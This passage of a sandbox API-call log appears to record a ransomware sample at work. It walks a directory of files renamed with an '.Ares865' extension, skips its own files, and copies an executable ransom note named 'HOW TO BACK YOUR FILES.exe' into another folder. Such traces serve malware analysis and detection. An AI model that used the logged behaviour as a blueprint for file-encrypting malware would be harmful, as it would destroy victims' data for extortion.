lpString2="MS.MSPUB.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.MSPUB.DEV.14.1033.hxn.Ares865") returned="MS.MSPUB.DEV.14.1033.hxn.Ares865" [0090.108] lstrlenW (lpString="MS.MSPUB.DEV.14.1033.hxn.Ares865") returned 32 [0090.108] lstrlenW (lpString="Ares865") returned 7 [0090.108] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.108] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x634310e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSTORE.14.1033.hxn.Ares865", cAlternateFileName="MSMSTO~1.ARE")) returned 1 [0090.108] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.108] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.108] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.MSTORE.14.1033.hxn.Ares865" | out: lpString1="MS.MSTORE.14.1033.hxn.Ares865") returned="MS.MSTORE.14.1033.hxn.Ares865" [0090.108] lstrlenW (lpString="MS.MSTORE.14.1033.hxn.Ares865") returned 29 [0090.108] lstrlenW (lpString="Ares865") returned 7 [0090.108] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.108] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63457240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OIS.14.1033.hxn.Ares865", cAlternateFileName="MSOIS1~1.ARE")) returned 1 [0090.108] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.108] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.108] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.OIS.14.1033.hxn.Ares865" | out: lpString1="MS.OIS.14.1033.hxn.Ares865") returned="MS.OIS.14.1033.hxn.Ares865" [0090.108] lstrlenW (lpString="MS.OIS.14.1033.hxn.Ares865") returned 26 [0090.109] lstrlenW (lpString="Ares865") returned 7 [0090.109] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.109] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63457240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.ONENOTE.14.1033.hxn.Ares865", cAlternateFileName="MSONEN~1.ARE")) returned 1 [0090.109] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.109] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.109] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.ONENOTE.14.1033.hxn.Ares865" | out: lpString1="MS.ONENOTE.14.1033.hxn.Ares865") returned="MS.ONENOTE.14.1033.hxn.Ares865" [0090.109] lstrlenW (lpString="MS.ONENOTE.14.1033.hxn.Ares865") returned 30 [0090.109] lstrlenW (lpString="Ares865") returned 7 [0090.109] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.109] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6347d3a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.14.1033.hxn.Ares865", cAlternateFileName="MSOUTL~1.ARE")) returned 1 [0090.109] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.109] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.109] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.OUTLOOK.14.1033.hxn.Ares865" | out: lpString1="MS.OUTLOOK.14.1033.hxn.Ares865") returned="MS.OUTLOOK.14.1033.hxn.Ares865" [0090.109] lstrlenW (lpString="MS.OUTLOOK.14.1033.hxn.Ares865") returned 30 [0090.109] lstrlenW (lpString="Ares865") returned 7 [0090.109] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.109] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x634a3500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSOUTL~2.ARE")) returned 1 [0090.109] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.109] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.109] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.OUTLOOK.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.OUTLOOK.DEV.14.1033.hxn.Ares865") returned="MS.OUTLOOK.DEV.14.1033.hxn.Ares865" [0090.109] lstrlenW (lpString="MS.OUTLOOK.DEV.14.1033.hxn.Ares865") returned 34 [0090.109] lstrlenW (lpString="Ares865") returned 7 [0090.109] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.109] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x634c9660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.14.1033.hxn.Ares865", cAlternateFileName="MSPOWE~1.ARE")) returned 1 [0090.109] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.109] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.109] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.POWERPNT.14.1033.hxn.Ares865" | out: lpString1="MS.POWERPNT.14.1033.hxn.Ares865") returned="MS.POWERPNT.14.1033.hxn.Ares865" [0090.109] lstrlenW (lpString="MS.POWERPNT.14.1033.hxn.Ares865") returned 31 [0090.109] lstrlenW (lpString="Ares865") returned 7 [0090.110] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.110] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x634c9660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSPOWE~2.ARE")) returned 1 [0090.110] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.110] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.110] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.POWERPNT.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.POWERPNT.DEV.14.1033.hxn.Ares865") returned="MS.POWERPNT.DEV.14.1033.hxn.Ares865" [0090.110] lstrlenW (lpString="MS.POWERPNT.DEV.14.1033.hxn.Ares865") returned 35 [0090.110] lstrlenW (lpString="Ares865") returned 7 [0090.110] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.110] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x634ef7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.SETLANG.14.1033.hxn.Ares865", cAlternateFileName="MSSETL~1.ARE")) returned 1 [0090.110] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.110] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.110] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.SETLANG.14.1033.hxn.Ares865" | out: lpString1="MS.SETLANG.14.1033.hxn.Ares865") returned="MS.SETLANG.14.1033.hxn.Ares865" [0090.110] lstrlenW (lpString="MS.SETLANG.14.1033.hxn.Ares865") returned 30 [0090.110] lstrlenW (lpString="Ares865") returned 7 [0090.110] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.110] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x634ef7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.14.1033.hxn.Ares865", cAlternateFileName="MSVISI~1.ARE")) returned 1 [0090.110] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.110] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.110] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.VISIO.14.1033.hxn.Ares865" | out: lpString1="MS.VISIO.14.1033.hxn.Ares865") returned="MS.VISIO.14.1033.hxn.Ares865" [0090.110] lstrlenW (lpString="MS.VISIO.14.1033.hxn.Ares865") returned 28 [0090.110] lstrlenW (lpString="Ares865") returned 7 [0090.110] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.110] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x63515920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSVISI~2.ARE")) returned 1 [0090.110] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.110] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.110] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.VISIO.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.VISIO.DEV.14.1033.hxn.Ares865") returned="MS.VISIO.DEV.14.1033.hxn.Ares865" [0090.110] lstrlenW (lpString="MS.VISIO.DEV.14.1033.hxn.Ares865") returned 32 [0090.110] lstrlenW (lpString="Ares865") returned 7 [0090.111] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.111] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6353ba80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865", cAlternateFileName="MSVISI~3.ARE")) returned 1 [0090.111] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.111] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.111] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865" | out: lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865") returned="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865" [0090.111] lstrlenW (lpString="MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865") returned 39 [0090.111] lstrlenW (lpString="Ares865") returned 7 [0090.111] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.111] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6353ba80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_PRM.14.1033.hxn.Ares865", cAlternateFileName="MSVISI~4.ARE")) returned 1 [0090.111] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.111] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.111] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.VISIO_PRM.14.1033.hxn.Ares865" | out: lpString1="MS.VISIO_PRM.14.1033.hxn.Ares865") returned="MS.VISIO_PRM.14.1033.hxn.Ares865" [0090.111] lstrlenW (lpString="MS.VISIO_PRM.14.1033.hxn.Ares865") returned 32 [0090.111] lstrlenW (lpString="Ares865") returned 7 [0090.111] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.111] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6353ba80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_STD.14.1033.hxn.Ares865", cAlternateFileName="MS2DAF~1.ARE")) returned 1 [0090.111] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.111] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.111] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.VISIO_STD.14.1033.hxn.Ares865" | out: lpString1="MS.VISIO_STD.14.1033.hxn.Ares865") returned="MS.VISIO_STD.14.1033.hxn.Ares865" [0090.111] lstrlenW (lpString="MS.VISIO_STD.14.1033.hxn.Ares865") returned 32 [0090.111] lstrlenW (lpString="Ares865") returned 7 [0090.111] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.111] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x63561be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.14.1033.hxn.Ares865", cAlternateFileName="MSWINP~1.ARE")) returned 1 [0090.111] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.111] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.112] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.WINPROJ.14.1033.hxn.Ares865" | out: lpString1="MS.WINPROJ.14.1033.hxn.Ares865") returned="MS.WINPROJ.14.1033.hxn.Ares865" [0090.112] lstrlenW (lpString="MS.WINPROJ.14.1033.hxn.Ares865") returned 30 [0090.112] lstrlenW (lpString="Ares865") returned 7 [0090.112] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.112] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x63561be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSWINP~2.ARE")) returned 1 [0090.112] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.112] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.112] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.WINPROJ.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.WINPROJ.DEV.14.1033.hxn.Ares865") returned="MS.WINPROJ.DEV.14.1033.hxn.Ares865" [0090.112] lstrlenW (lpString="MS.WINPROJ.DEV.14.1033.hxn.Ares865") returned 34 [0090.112] lstrlenW (lpString="Ares865") returned 7 [0090.112] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.112] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63587d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.14.1033.hxn.Ares865", cAlternateFileName="MSWINW~1.ARE")) returned 1 [0090.112] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.112] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.112] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.WINWORD.14.1033.hxn.Ares865" | out: lpString1="MS.WINWORD.14.1033.hxn.Ares865") returned="MS.WINWORD.14.1033.hxn.Ares865" [0090.112] lstrlenW (lpString="MS.WINWORD.14.1033.hxn.Ares865") returned 30 [0090.112] lstrlenW (lpString="Ares865") returned 7 [0090.112] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.112] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63587d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSWINW~2.ARE")) returned 1 [0090.112] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.112] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.112] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.WINWORD.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.WINWORD.DEV.14.1033.hxn.Ares865") returned="MS.WINWORD.DEV.14.1033.hxn.Ares865" [0090.112] lstrlenW (lpString="MS.WINWORD.DEV.14.1033.hxn.Ares865") returned 34 [0090.112] lstrlenW (lpString="Ares865") returned 7 [0090.112] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.112] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0x635adea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x24e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nslist.hxl.Ares865", cAlternateFileName="NSLIST~1.ARE")) returned 1 [0090.112] lstrcmpiW (lpString1="nslist.hxl.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.112] lstrcmpiW (lpString1="nslist.hxl.Ares865", lpString2="aoldtz.exe") returned 1 [0090.113] lstrcpyW (in: lpString1=0x2cce466, lpString2="nslist.hxl.Ares865" | out: lpString1="nslist.hxl.Ares865") returned="nslist.hxl.Ares865" [0090.113] lstrlenW (lpString="nslist.hxl.Ares865") returned 18 [0090.113] lstrlenW (lpString="Ares865") returned 7 [0090.113] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.113] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0x635adea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x24e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nslist.hxl.Ares865", cAlternateFileName="NSLIST~1.ARE")) returned 0 [0090.113] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.113] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0090.113] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft") returned="C:\\Users\\All Users\\Application Data\\Microsoft" [0090.113] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft") returned="C:\\Users\\All Users\\Application Data\\Microsoft" [0090.113] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.113] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.114] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.114] GetLastError () returned 0x0 [0090.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.114] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.114] CloseHandle (hObject=0x120) returned 1 [0090.114] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.114] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.114] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.114] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.114] 